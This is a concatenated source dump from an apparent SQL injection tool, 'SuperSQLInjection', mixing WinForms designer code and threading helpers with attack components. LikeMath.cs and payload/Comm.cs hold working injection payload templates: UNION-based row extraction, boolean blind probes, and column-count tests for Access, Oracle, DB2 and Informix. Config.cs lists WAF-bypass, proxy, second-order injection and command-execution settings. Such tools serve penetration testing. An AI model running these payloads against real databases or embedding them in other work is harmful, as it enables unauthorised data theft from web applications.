((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) 38 | | System.Windows.Forms.AnchorStyles.Left) 39 | | System.Windows.Forms.AnchorStyles.Right))); 40 | this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None; 41 | this.richTextBox1.Location = new System.Drawing.Point(12, 12); 42 | this.richTextBox1.Name = "richTextBox1"; 43 | this.richTextBox1.ReadOnly = true; 44 | this.richTextBox1.Size = new System.Drawing.Size(571, 326); 45 | this.richTextBox1.TabIndex = 2; 46 | this.richTextBox1.Text = resources.GetString("richTextBox1.Text"); 47 | // 48 | // About 49 | // 50 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F); 51 | this.AutoScaleMode = 
System.Windows.Forms.AutoScaleMode.Font; 52 | this.ClientSize = new System.Drawing.Size(595, 351); 53 | this.Controls.Add(this.richTextBox1); 54 | this.Name = "About"; 55 | this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; 56 | this.Text = "关 于"; 57 | this.ResumeLayout(false); 58 | 59 | } 60 | 61 | #endregion 62 | 63 | private System.Windows.Forms.RichTextBox richTextBox1; 64 | 65 | 66 | 67 | 68 | } 69 | } -------------------------------------------------------------------------------- /SuperSQLInjection/tools/smartthread/Stopwatch.cs: --------------------------------------------------------------------------------
using System;

namespace Amib.Threading.Internal
{
    /// <summary>
    /// Stopwatch class.
    /// Used with WindowsCE and Silverlight which don't have Stopwatch.
    /// </summary>
    /// <remarks>
    /// Timestamps are taken from <see cref="DateTime.UtcNow"/>, i.e. the wall clock,
    /// so a system clock adjustment made while the stopwatch is running changes the
    /// measured interval. Nothing here synchronizes access to the fields.
    /// </remarks>
    internal class Stopwatch
    {
        // Ticks accumulated by completed Start/Stop intervals.
        private long _elapsed;
        private bool _isRunning;
        // Timestamp of the most recent Start(); only meaningful while running.
        private long _startTimeStamp;

        /// <summary>Creates a stopped stopwatch with zero elapsed time.</summary>
        public Stopwatch()
        {
            Reset();
        }

        /// <summary>Elapsed time in DateTime ticks; same value as the raw tick count.</summary>
        private long GetElapsedDateTimeTicks()
        {
            return GetRawElapsedTicks();
        }

        /// <summary>Accumulated ticks plus the current interval when running.</summary>
        private long GetRawElapsedTicks()
        {
            if (!_isRunning)
            {
                return _elapsed;
            }

            long sinceStart = GetTimestamp() - _startTimeStamp;
            return _elapsed + sinceStart;
        }

        /// <summary>Current UTC time expressed in ticks.</summary>
        public static long GetTimestamp()
        {
            return DateTime.UtcNow.Ticks;
        }

        /// <summary>Stops the stopwatch and clears the accumulated time.</summary>
        public void Reset()
        {
            _startTimeStamp = 0L;
            _isRunning = false;
            _elapsed = 0L;
        }

        /// <summary>Starts (or resumes) measuring; does nothing when already running.</summary>
        public void Start()
        {
            if (_isRunning)
            {
                return;
            }

            _startTimeStamp = GetTimestamp();
            _isRunning = true;
        }

        /// <summary>Creates a stopwatch and starts it immediately.</summary>
        public static Stopwatch StartNew()
        {
            Stopwatch created = new Stopwatch();
            created.Start();
            return created;
        }

        /// <summary>Stops measuring and adds the current interval to the total.</summary>
        public void Stop()
        {
            if (!_isRunning)
            {
                return;
            }

            _elapsed += GetTimestamp() - _startTimeStamp;
            _isRunning = false;
        }

        // Properties

        /// <summary>Total elapsed time as a <see cref="TimeSpan"/>.</summary>
        public TimeSpan Elapsed
        {
            get { return new TimeSpan(GetElapsedDateTimeTicks()); }
        }

        /// <summary>Total elapsed time in whole milliseconds.</summary>
        public long ElapsedMilliseconds
        {
            // TimeSpan.TicksPerMillisecond is 10000 (0x2710).
            get { return GetElapsedDateTimeTicks() / TimeSpan.TicksPerMillisecond; }
        }

        /// <summary>Total elapsed time in ticks.</summary>
        public long ElapsedTicks
        {
            get { return GetRawElapsedTicks(); }
        }

        /// <summary>True while the stopwatch is measuring.</summary>
        public bool IsRunning
        {
            get { return _isRunning; }
        }
    }
}
-------------------------------------------------------------------------------- /SuperSQLInjection/AddNode.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace SuperSQLInjection 2 | { 3 | partial class AddNode 4 | { 5 | /// 6 | /// Required designer variable. 7 | /// 8 | private System.ComponentModel.IContainer components = null; 9 | 10 | /// 11 | /// Clean up any resources being used. 12 | /// 13 | /// true if managed resources should be disposed; otherwise, false. 14 | protected override void Dispose(bool disposing) 15 | { 16 | if (disposing && (components != null)) 17 | { 18 | components.Dispose(); 19 | } 20 | base.Dispose(disposing); 21 | } 22 | 23 | #region Windows Form Designer generated code 24 | 25 | /// 26 | /// Required method for Designer support - do not modify 27 | /// the contents of this method with the code editor. 
28 | /// 29 | private void InitializeComponent() 30 | { 31 | this.btn_addNode = new System.Windows.Forms.Button(); 32 | this.txt_node_text = new System.Windows.Forms.TextBox(); 33 | this.SuspendLayout(); 34 | // 35 | // btn_addNode 36 | // 37 | this.btn_addNode.Location = new System.Drawing.Point(192, 21); 38 | this.btn_addNode.Name = "btn_addNode"; 39 | this.btn_addNode.Size = new System.Drawing.Size(56, 23); 40 | this.btn_addNode.TabIndex = 0; 41 | this.btn_addNode.Text = "添 加"; 42 | this.btn_addNode.UseVisualStyleBackColor = true; 43 | this.btn_addNode.Click += new System.EventHandler(this.btn_addNode_Click); 44 | // 45 | // txt_node_text 46 | // 47 | this.txt_node_text.Location = new System.Drawing.Point(21, 21); 48 | this.txt_node_text.Name = "txt_node_text"; 49 | this.txt_node_text.Size = new System.Drawing.Size(152, 21); 50 | this.txt_node_text.TabIndex = 1; 51 | // 52 | // AddNode 53 | // 54 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F); 55 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; 56 | this.ClientSize = new System.Drawing.Size(266, 64); 57 | this.Controls.Add(this.txt_node_text); 58 | this.Controls.Add(this.btn_addNode); 59 | this.Name = "AddNode"; 60 | this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; 61 | this.Text = "AddNode"; 62 | this.ResumeLayout(false); 63 | this.PerformLayout(); 64 | 65 | } 66 | 67 | #endregion 68 | 69 | private System.Windows.Forms.Button btn_addNode; 70 | private System.Windows.Forms.TextBox txt_node_text; 71 | } 72 | } -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/app.manifest: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 47 | 54 | 55 | 69 | -------------------------------------------------------------------------------- 
/SuperSQLInjection/tools/smartthread/EventWaitHandleFactory.cs: --------------------------------------------------------------------------------
using System.Threading;

#if (_WINDOWS_CE)
using System;
using System.Runtime.InteropServices;
#endif

namespace Amib.Threading.Internal
{
    /// <summary>
    /// EventWaitHandleFactory class.
    /// This is a static class that creates AutoResetEvent and ManualResetEvent objects.
    /// In WindowCE the WaitForMultipleObjects API fails to use the Handle property
    /// of XxxResetEvent. It can use only handles that were created by the CreateEvent API.
    /// Consequently this class creates the needed XxxResetEvent and replaces the handle if
    /// it's a WindowsCE OS.
    /// </summary>
    public static class EventWaitHandleFactory
    {
        /// <summary>
        /// Create a new AutoResetEvent object. The event is created non-signaled.
        /// </summary>
        /// <returns>Return a new AutoResetEvent object</returns>
        public static AutoResetEvent CreateAutoResetEvent()
        {
            AutoResetEvent autoEvent = new AutoResetEvent(false);

#if (_WINDOWS_CE)
            // Only compiled for WindowsCE: swap in a handle made by CreateEvent.
            ReplaceEventHandle(autoEvent, false, false);
#endif

            return autoEvent;
        }

        /// <summary>
        /// Create a new ManualResetEvent object
        /// </summary>
        /// <param name="initialState">Initial state passed to the ManualResetEvent constructor.</param>
        /// <returns>Return a new ManualResetEvent object</returns>
        public static ManualResetEvent CreateManualResetEvent(bool initialState)
        {
            ManualResetEvent manualEvent = new ManualResetEvent(initialState);

#if (_WINDOWS_CE)
            // Only compiled for WindowsCE: swap in a handle made by CreateEvent.
            ReplaceEventHandle(manualEvent, true, initialState);
#endif

            return manualEvent;
        }

#if (_WINDOWS_CE)

        ///
        /// Replace the event handle
        ///
        /// The WaitHandle object which its handle needs to be replaced.
56 | /// Indicates if the event is a ManualResetEvent (true) or an AutoResetEvent (false) 57 | /// The initial state of the event 58 | private static void ReplaceEventHandle(WaitHandle waitHandle, bool manualReset, bool initialState) 59 | { 60 | // Store the old handle 61 | IntPtr oldHandle = waitHandle.Handle; 62 | 63 | // Create a new event 64 | IntPtr newHandle = CreateEvent(IntPtr.Zero, manualReset, initialState, null); 65 | 66 | // Replace the old event with the new event 67 | waitHandle.Handle = newHandle; 68 | 69 | // Close the old event 70 | CloseHandle (oldHandle); 71 | } 72 | 73 | [DllImport("coredll.dll", SetLastError = true)] 74 | public static extern IntPtr CreateEvent(IntPtr lpEventAttributes, bool bManualReset, bool bInitialState, string lpName); 75 | 76 | //Handle 77 | [DllImport("coredll.dll", SetLastError = true)] 78 | public static extern bool CloseHandle(IntPtr hObject); 79 | #endif 80 | 81 | } 82 | } 83 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/LikeMath.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | 5 | namespace SuperSQLInjection.tools 6 | { 7 | public class LikeMath 8 | { 9 | /// vers = null; 10 | //获取数据条数 11 | public static String data_count = "(select count(1) from {table})"; 12 | 13 | //判断条数 14 | public static String bool_datas_count = " " + data_count + ">={len}"; 15 | 16 | public static String substr = "mid(({data}),{index},1)"; 17 | 18 | //bool方式字符长度判断 19 | public static String bool_length = " len({data})>{len}"; 20 | 21 | public static String bool_value = " {data}>{len}"; 22 | 23 | //获取行数据 24 | public static String data_value = "(select top 1 {data} from (select top {index} {allcolumns} from {table} order by {orderby} asc) t order by t.{orderby} desc)"; 25 | 26 | //union获取值 27 | public static String union_value = " and 1=2 union all select {data} from 
{table}"; 28 | 29 | //多字符 30 | public static String unicode_value = "ascw(mid({data},{index},1))"; 31 | 32 | 33 | public static String getUnionDataValue(int columnsLen, int showIndex,String Fill,List columns, String table, String index) 34 | { 35 | StringBuilder sb = new StringBuilder(); 36 | String data = "chr(94)&chr(94)&chr(33)&" + Comm.unionColumns(columns, "&chr(36)&chr(36)&chr(36)&") + "&chr(33)&chr(94)&chr(94)"; 37 | for (int i = 1; i <= columnsLen; i++) 38 | { 39 | if (i == showIndex) 40 | { 41 | sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{table}", table).Replace("{index}", index).Replace("{orderby}", columns[0])); 42 | sb.Append(","); 43 | } 44 | else 45 | { 46 | sb.Append(Fill+","); 47 | } 48 | } 49 | sb.Remove(sb.Length - 1, 1); 50 | return union_value.Replace("{data}", sb.ToString()); 51 | } 52 | 53 | 54 | public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, String dataPayLoad) 55 | { 56 | StringBuilder sb = new StringBuilder(); 57 | for (int i = 1; i <= columnsLen; i++) 58 | { 59 | if (i == showIndex) 60 | { 61 | sb.Append("(chr(94)&chr(94)&chr(33)&" + dataPayLoad + "&chr(33)&chr(94)&chr(94)),"); 62 | } 63 | else 64 | { 65 | sb.Append(Fill + ","); 66 | } 67 | } 68 | sb.Remove(sb.Length - 1, 1); 69 | return union_value.Replace("{data}", sb.ToString()); 70 | } 71 | public static String getBoolDataPayLoad(String column,List columns,String dbName, String table, int index) 72 | { 73 | String data = data_value.Replace("{data}",column).Replace("{allcolumns}",Comm.unionColumns(columns,",")).Replace("{orderby}",columns[0]); 74 | String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", column).Replace("{index}", index.ToString()); 75 | return payload; 76 | } 77 | 78 | 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/ListViewColumnSorter.cs: 
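--------------------------------------------------------------------------------
using System;
using System.Collections;
using System.Collections.Generic;
using System.Text;
using System.Windows.Forms;

namespace SuperSQLInjection.tools
{
    /// <summary>
    /// IComparer used to sort ListView rows by the text of one column.
    /// </summary>
    class ListViewColumnSorter:IComparer
    {
        /// <summary>
        /// Index of the column to sort by.
        /// </summary>
        private int ColumnToSort;

        /// <summary>
        /// Sort direction.
        /// </summary>
        public SortOrder OrderOfSort;

        /// <summary>
        /// CaseInsensitiveComparer instance, see
        /// ms-help://MS.VSCC.2003/MS.MSDNQTR.2003FEB.2052/cpref/html/frlrfSystemCollectionsCaseInsensitiveComparerClassTopic.htm
        /// It is created in the constructor; Compare below does not use it.
        /// </summary>
        private CaseInsensitiveComparer ObjectCompare;

        /// <summary>
        /// Constructor.
        /// </summary>
        public ListViewColumnSorter()
        {
            // Sort by the first column by default.
            ColumnToSort = 0;

            // No sorting until a direction is chosen.
            OrderOfSort = SortOrder.None;

            // Initialize the CaseInsensitiveComparer instance.
            ObjectCompare = new CaseInsensitiveComparer();
        }

        /// <summary>
        /// Text of the given column, or an empty string when the row has no such
        /// sub-item (indexing SubItems out of range would throw during a sort).
        /// </summary>
        private static string SubItemText(ListViewItem item, int column)
        {
            if (column < 0 || column >= item.SubItems.Count)
            {
                return string.Empty;
            }
            return item.SubItems[column].Text;
        }

        /// <summary>
        /// IComparer implementation: compares the sort-column text of two rows.
        /// </summary>
        /// <param name="x">First object to compare; must be a ListViewItem.</param>
        /// <param name="y">Second object to compare; must be a ListViewItem.</param>
        /// <returns>
        /// The MyCopare result for ascending order, its negation for descending
        /// order, and 0 when no sort order is set.
        /// </returns>
        public int Compare(object x, object y)
        {
            // Convert the compared objects to ListViewItem.
            ListViewItem listviewX = (ListViewItem)x;
            ListViewItem listviewY = (ListViewItem)y;

            // Compare the text of the sort column.
            int compareResult = new MyCopare().Compare(
                SubItemText(listviewX, ColumnToSort),
                SubItemText(listviewY, ColumnToSort));

            if (OrderOfSort == SortOrder.Ascending)
            {
                // Ascending: return the result as is.
                return compareResult;
            }
            else if (OrderOfSort == SortOrder.Descending)
            {
                // Descending: return the negated result.
                return (-compareResult);
            }
            else
            {
                // No sort order: treat the rows as equal.
                return 0;
            }
        }

        /**/
        ///
        /// Gets or sets the column to sort by.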
84 | /// 85 | public int SortColumn 86 | { 87 | set 88 | { 89 | ColumnToSort = value; 90 | } 91 | get 92 | { 93 | return ColumnToSort; 94 | } 95 | } 96 | 97 | /**/ 98 | /// 99 | /// 获取或设置排序方式. 100 | /// 101 | public SortOrder Order 102 | { 103 | set 104 | { 105 | OrderOfSort = value; 106 | } 107 | get 108 | { 109 | return OrderOfSort; 110 | } 111 | } 112 | } 113 | } 114 | 115 | -------------------------------------------------------------------------------- /SuperSQLInjection/model/Config.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | using System.Collections; 5 | 6 | namespace SuperSQLInjection.model 7 | { 8 | [Serializable] 9 | public class Config 10 | { 11 | public Config() { 12 | 13 | } 14 | public String saveConfigpath = ""; 15 | public String time = ""; 16 | public String domain = ""; 17 | public String uri = "";//注入URI 18 | public String pname = "";//当前注入参数 19 | public String testPayload = "";//注入测试payload 20 | public int port = 80; 21 | public int maxTime = 5 ;//延时注入判断阀值 22 | public InjectType injectType=new InjectType(); 23 | public DBType dbType = new DBType(); 24 | public int timeOut = 10;//秒 25 | public int threadSize = 1; 26 | public int reTry = 2; 27 | public String encoding = "UTF-8"; 28 | public String cmd_encoding = "UTF-8"; 29 | public String request = ""; 30 | public String sencondRequest = ""; 31 | public String key = ""; 32 | public int injectHTTPCode = 0;//注入逻辑为真的时候页面的状态码 33 | public String db_encoding = "UTF-8"; 34 | public Boolean useCode = false; 35 | public int columnsCount = 0; 36 | 37 | public String unionFillTemplate = "";//DB2填充模板 38 | 39 | public Boolean sencondInject = false;//二次注入 40 | public int showColumn = 0; 41 | public Boolean reverseKey = false;//反取关键字 42 | public KeyType keyType = KeyType.Key;//判断类型,可以盲注以关键字或时间判断 43 | public Boolean isMuStr = true;//开启多字节字符 44 | public Boolean is_foward_302 = false; 45 | 
public Boolean isOpenInfoLog=true;//开启底部日志 46 | public Boolean isOpenHTTPLog = true;//开启HTTP日志 47 | public Boolean isAutoCheckUpdate = true;//自动检查更新 48 | public Boolean isSavaConfigWhenClose = true;//自动保存配置 49 | public Boolean useSSL = false;//ssl 50 | public Boolean isOpenURLEncoding = true;//开启URL编码 51 | public Boolean redirectDoGet = false;//重定向使用的请求方法 52 | public int maxClolumns = 50; 53 | public int urlencodeCount = 1;//url编码次数 54 | public String unionFill = "1";//union查询填充列 55 | //token 56 | public String token_request = "";//获取token的request 57 | public String token_startStr = "";//获取token的开始字符 58 | public String token_endStr = "";//获取token的结束字符 59 | 60 | 61 | //file 62 | public String readFileEncoding = "GBK"; 63 | 64 | //cmd 65 | public Boolean showCmdResult = true; 66 | 67 | //bypass 68 | public Boolean reaplaceBeforURLEncode = true;//是否在URL编码前处理bypass字符 69 | public Boolean inculdeStr = false; 70 | public int keyReplace = 0; 71 | public String randIPToHeader = ""; 72 | public int sendHTTPSleepTime = 0; 73 | public String replaceStrs="";//字符替换 74 | public int base64Count = 0; 75 | public Boolean useBetweenByPass = false;//between绕过 76 | public Boolean usehex = false;//hex绕过 77 | public Boolean useUnicode = false;//uniocde绕过 78 | public String retryKey = "";//重新发包的关键字 79 | //scan 80 | public int level = 0; 81 | public int linkCount = 1; 82 | public int maxSpiderCount=10; 83 | public int maxScanCount = 10; 84 | 85 | //proxy 86 | public int proxy_mode = 0;//0关闭代理,1随机代理,2固定代理 87 | public String proxy_check_host = "www.baidu.com"; 88 | public int proxy_check_port = 80; 89 | public String proxy_check_Keys = "百度一下,你就知道"; 90 | } 91 | } 92 | -------------------------------------------------------------------------------- /SuperSQLInjection/payload/Comm.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | using tools; 5 | 6 | namespace 
SuperSQLInjection.payload 7 | { 8 | class Comm 9 | { 10 | 11 | public const String COLUMNS_SPLIT_STR = "$\t$"; 12 | public const String COLUMNS_REG_SPLIT_STR = "\\$\\t\\$|\\$\\\\t\\$"; 13 | 14 | public static String COLUMNS_SPLIT_HEX_STR = Tools.strToHex(COLUMNS_SPLIT_STR, "UTF-8"); 15 | public static String exists_table = " exists(select 1 from {0})"; 16 | public static String exists_column = " exists(select {0} from {1})"; 17 | public static String truePayload = " 1=1"; 18 | public static String falsePayload = " 1=2"; 19 | 20 | public static String unionColumns(List columns, String unionStr) 21 | { 22 | StringBuilder sb = new StringBuilder(); 23 | foreach (String column in columns) 24 | { 25 | sb.Append(column + unionStr); 26 | } 27 | sb.Remove(sb.Length - unionStr.Length, unionStr.Length); 28 | return sb.ToString(); 29 | } 30 | 31 | 32 | public static String unionColumnCountTest(int maxColumn,String fill) 33 | { 34 | StringBuilder sb = new StringBuilder(" 1=2 union all select "); 35 | for (int i = 1; i <= maxColumn;i++ ) 36 | { 37 | sb.Append(fill+"+"+i+","); 38 | } 39 | sb.Remove(sb.Length - 1, 1); 40 | return sb.ToString(); 41 | } 42 | 43 | public static String unionColumnCountTestByOracle(int maxColumn, String fill) 44 | { 45 | StringBuilder sb = new StringBuilder(" 1=2 union all select "); 46 | for (int i = 1; i <= maxColumn; i++) 47 | { 48 | sb.Append(fill + ","); 49 | } 50 | sb.Remove(sb.Length - 1, 1); 51 | return sb.ToString()+" from dual"; 52 | } 53 | 54 | public static String unionColumnCountTestByOracle(int maxColumn,int testIndex,String fill) 55 | { 56 | 57 | return unionColumnCountTest(maxColumn,testIndex,fill) + " from dual"; 58 | } 59 | 60 | public static String unionColumnCountTestByDB2(String unionTempaldate, String fill) 61 | { 62 | StringBuilder sb = new StringBuilder(" 1=2 union all select "); 63 | sb.Append(unionTempaldate.Replace("{data}", fill)); 64 | sb.Append(" from sysibm.sysdummy1"); 65 | return sb.ToString(); 66 | } 67 | 68 | public 
static String unionColumnCountTestByInformix(String unionTempaldate, String fill) 69 | { 70 | StringBuilder sb = new StringBuilder(" 1=2 union all select "); 71 | sb.Append(unionTempaldate.Replace("{data}", fill)); 72 | sb.Append(" from sysmaster:sysdual"); 73 | return sb.ToString(); 74 | } 75 | 76 | 77 | public static String unionColumnCountTest(int maxColumn, int testIndex, String fill) 78 | { 79 | StringBuilder sb = new StringBuilder(" 1=2 union all select "); 80 | for (int i = 1; i <= maxColumn; i++) 81 | { 82 | if (i == testIndex) 83 | { 84 | sb.Append(fill + ","); 85 | } 86 | else 87 | { 88 | sb.Append("null" + ","); 89 | } 90 | } 91 | sb.Remove(sb.Length - 1, 1); 92 | return sb.ToString(); 93 | } 94 | 95 | 96 | 97 | } 98 | } 99 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/smartthread/EventWaitHandle.cs: -------------------------------------------------------------------------------- 1 | #if (_WINDOWS_CE) 2 | 3 | using System; 4 | using System.Runtime.InteropServices; 5 | using System.Threading; 6 | 7 | namespace Amib.Threading.Internal 8 | { 9 | /// 10 | /// EventWaitHandle class 11 | /// In WindowsCE this class doesn't exist and I needed the WaitAll and WaitAny implementation. 12 | /// So I wrote this class to implement these two methods with some of their overloads. 13 | /// It uses the WaitForMultipleObjects API to do the WaitAll and WaitAny. 14 | /// Note that this class doesn't even inherit from WaitHandle! 
15 | /// 16 | public class STPEventWaitHandle 17 | { 18 | #region Public Constants 19 | 20 | public const int WaitTimeout = Timeout.Infinite; 21 | 22 | #endregion 23 | 24 | #region Private External Constants 25 | 26 | private const Int32 WAIT_FAILED = -1; 27 | private const Int32 WAIT_TIMEOUT = 0x102; 28 | private const UInt32 INFINITE = 0xFFFFFFFF; 29 | 30 | #endregion 31 | 32 | #region WaitAll and WaitAny 33 | 34 | internal static bool WaitOne(WaitHandle waitHandle, int millisecondsTimeout, bool exitContext) 35 | { 36 | return waitHandle.WaitOne(millisecondsTimeout, exitContext); 37 | } 38 | 39 | private static IntPtr[] PrepareNativeHandles(WaitHandle[] waitHandles) 40 | { 41 | IntPtr[] nativeHandles = new IntPtr[waitHandles.Length]; 42 | for (int i = 0; i < waitHandles.Length; i++) 43 | { 44 | nativeHandles[i] = waitHandles[i].Handle; 45 | } 46 | return nativeHandles; 47 | } 48 | 49 | public static bool WaitAll(WaitHandle[] waitHandles, int millisecondsTimeout, bool exitContext) 50 | { 51 | uint timeout = millisecondsTimeout < 0 ? INFINITE : (uint)millisecondsTimeout; 52 | 53 | IntPtr[] nativeHandles = PrepareNativeHandles(waitHandles); 54 | 55 | int result = WaitForMultipleObjects((uint)waitHandles.Length, nativeHandles, true, timeout); 56 | 57 | if (result == WAIT_TIMEOUT || result == WAIT_FAILED) 58 | { 59 | return false; 60 | } 61 | 62 | return true; 63 | } 64 | 65 | 66 | public static int WaitAny(WaitHandle[] waitHandles, int millisecondsTimeout, bool exitContext) 67 | { 68 | uint timeout = millisecondsTimeout < 0 ? 
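INFINITE : (uint)millisecondsTimeout; 69 | 70 | IntPtr[] nativeHandles = PrepareNativeHandles(waitHandles); 71 | 72 | int result = WaitForMultipleObjects((uint)waitHandles.Length, nativeHandles, false, timeout); 73 | 74 | if (result >= 0 && result < waitHandles.Length) 75 | { 76 | return result; 77 | } 78 | 79 | return -1; 80 | } 81 | 82 | public static int WaitAny(WaitHandle[] waitHandles) 83 | { 84 | return WaitAny(waitHandles, Timeout.Infinite, false); 85 | } 86 | 87 | public static int WaitAny(WaitHandle[] waitHandles, TimeSpan timeout, bool exitContext) 88 | { 89 | int millisecondsTimeout = (int)timeout.TotalMilliseconds; 90 | 91 | return WaitAny(waitHandles, millisecondsTimeout, false); 92 | } 93 | 94 | #endregion 95 | 96 | #region External methods 97 | 98 | [DllImport("coredll.dll", SetLastError = true)] 99 | public static extern int WaitForMultipleObjects(uint nCount, IntPtr[] lpHandles, bool fWaitAll, uint dwMilliseconds); 100 | 101 | #endregion 102 | } 103 | } 104 | #endif -------------------------------------------------------------------------------- /SuperSQLInjection/tools/encode/URLEncode.cs: --------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Text;

namespace SuperSQLInjection.tools
{
    /// <summary>
    /// Percent-encoding helpers for URL values and URL paths.
    /// </summary>
    class URLEncode
    {
        /// <summary>
        /// Percent-encodes <paramref name="sInput"/> using UTF-8 bytes.
        /// </summary>
        /// <param name="sInput">Text to encode; null or empty is returned unchanged.</param>
        /// <returns>The encoded text, with lowercase hex digits.</returns>
        public static string UrlEncode(string sInput)
        {
            return UrlEncodeChars(sInput, Encoding.UTF8);
        }

        /// <summary>
        /// Percent-encodes <paramref name="sInput"/> using the bytes produced by <paramref name="oEnc"/>.
        /// </summary>
        /// <param name="sInput">Text to encode; null or empty is returned unchanged.</param>
        /// <param name="oEnc">Character encoding; UTF-8 is used when null.</param>
        /// <returns>The encoded text, with lowercase hex digits.</returns>
        public static string UrlEncode(string sInput, Encoding oEnc)
        {
            return UrlEncodeChars(sInput, oEnc);
        }

        /// <summary>
        /// Appends the percent-encoded bytes of the character at <paramref name="index"/>.
        /// A surrogate pair is encoded as one unit: encoding each half separately makes
        /// the encoder emit its replacement bytes instead of the real code point.
        /// </summary>
        /// <returns>The number of chars consumed from <paramref name="str"/> (1 or 2).</returns>
        private static int AppendEncodedChar(StringBuilder target, string str, int index, Encoding enc, string hexFormat)
        {
            int length = 1;
            if (char.IsHighSurrogate(str[index]) && index + 1 < str.Length && char.IsLowSurrogate(str[index + 1]))
            {
                length = 2;
            }

            byte[] bytes = enc.GetBytes(str.ToCharArray(index, length));
            foreach (byte b in bytes)
            {
                target.Append('%');
                target.Append(b.ToString(hexFormat));
            }
            return length;
        }

        /// <summary>
        /// Encodes every character except ASCII letters, digits and <c>- . ( ) * ' _ !</c>,
        /// which are copied through unchanged.
        /// </summary>
        private static string UrlEncodeChars(string str, Encoding oEnc)
        {
            if (string.IsNullOrEmpty(str))
            {
                return str;
            }

            // A null encoding used to fail on the first character that needed encoding.
            Encoding enc = oEnc ?? Encoding.UTF8;
            StringBuilder encoded = new StringBuilder(str.Length);
            int i = 0;
            while (i < str.Length)
            {
                char c = str[i];
                bool copyThrough = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9')
                    || c == '-' || c == '.' || c == '(' || c == ')' || c == '*' || c == '\'' || c == '_' || c == '!';
                if (copyThrough)
                {
                    encoded.Append(c);
                    i++;
                }
                else
                {
                    i += AppendEncodedChar(encoded, str, i, enc, "x2");
                }
            }
            return encoded.ToString();
        }

        // Fiddler.Utilities
        /// <summary>
        /// Encodes the part of <paramref name="str"/> before the first '?' as a URL path
        /// and leaves everything from the '?' on untouched.
        /// </summary>
        /// <param name="str">URL or path; null or empty is returned unchanged.</param>
        /// <returns>The text with the path part encoded, with uppercase hex digits.</returns>
        public static string UrlPathEncode(string str)
        {
            if (string.IsNullOrEmpty(str))
            {
                return str;
            }
            int num = str.IndexOf('?');
            if (num >= 0)
            {
                return UrlPathEncode(str.Substring(0, num)) + str.Substring(num);
            }
            return UrlPathEncodeChars(str);
        }

        /// <summary>
        /// Copies printable ASCII (above space, below U+007F) through and percent-encodes
        /// the rest: space and control characters as a single byte, everything else as UTF-8.
        /// </summary>
        private static string UrlPathEncodeChars(string str)
        {
            if (string.IsNullOrEmpty(str))
            {
                return str;
            }

            StringBuilder encoded = new StringBuilder(str.Length);
            int i = 0;
            while (i < str.Length)
            {
                char c = str[i];
                if (c > ' ' && c < '\u007f')
                {
                    encoded.Append(c);
                    i++;
                }
                else if (c < '!')
                {
                    encoded.Append('%');
                    encoded.Append(((byte)c).ToString("X2"));
                    i++;
                }
                else
                {
                    i += AppendEncodedChar(encoded, str, i, Encoding.UTF8, "X2");
                }
            }
            return encoded.ToString();
        }
    }
}
-------------------------------------------------------------------------------- /SuperSQLInjection/FindString.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace SuperSQLInjection 2 | { 3 | partial class FindString 4 | { 5 | /// 6 | /// Required designer variable. 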
7 | /// 8 | private System.ComponentModel.IContainer components = null; 9 | 10 | /// 11 | /// Clean up any resources being used. 12 | /// 13 | /// true if managed resources should be disposed; otherwise, false. 14 | protected override void Dispose(bool disposing) 15 | { 16 | if (disposing && (components != null)) 17 | { 18 | components.Dispose(); 19 | } 20 | base.Dispose(disposing); 21 | } 22 | 23 | #region Windows Form Designer generated code 24 | 25 | /// 26 | /// Required method for Designer support - do not modify 27 | /// the contents of this method with the code editor. 28 | /// 29 | private void InitializeComponent() 30 | { 31 | this.btn_find = new System.Windows.Forms.Button(); 32 | this.txt_key = new System.Windows.Forms.TextBox(); 33 | this.label1 = new System.Windows.Forms.Label(); 34 | this.label2 = new System.Windows.Forms.Label(); 35 | this.SuspendLayout(); 36 | // 37 | // btn_find 38 | // 39 | this.btn_find.Location = new System.Drawing.Point(279, 17); 40 | this.btn_find.Name = "btn_find"; 41 | this.btn_find.Size = new System.Drawing.Size(75, 23); 42 | this.btn_find.TabIndex = 0; 43 | this.btn_find.Text = "查找"; 44 | this.btn_find.UseVisualStyleBackColor = true; 45 | this.btn_find.Click += new System.EventHandler(this.btn_find_Click); 46 | // 47 | // txt_key 48 | // 49 | this.txt_key.Location = new System.Drawing.Point(83, 19); 50 | this.txt_key.Name = "txt_key"; 51 | this.txt_key.Size = new System.Drawing.Size(112, 21); 52 | this.txt_key.TabIndex = 1; 53 | this.txt_key.TextChanged += new System.EventHandler(this.txt_key_TextChanged); 54 | // 55 | // label1 56 | // 57 | this.label1.AutoSize = true; 58 | this.label1.Location = new System.Drawing.Point(12, 22); 59 | this.label1.Name = "label1"; 60 | this.label1.Size = new System.Drawing.Size(65, 12); 61 | this.label1.TabIndex = 2; 62 | this.label1.Text = "查找字符:"; 63 | // 64 | // label2 65 | // 66 | this.label2.AutoSize = true; 67 | 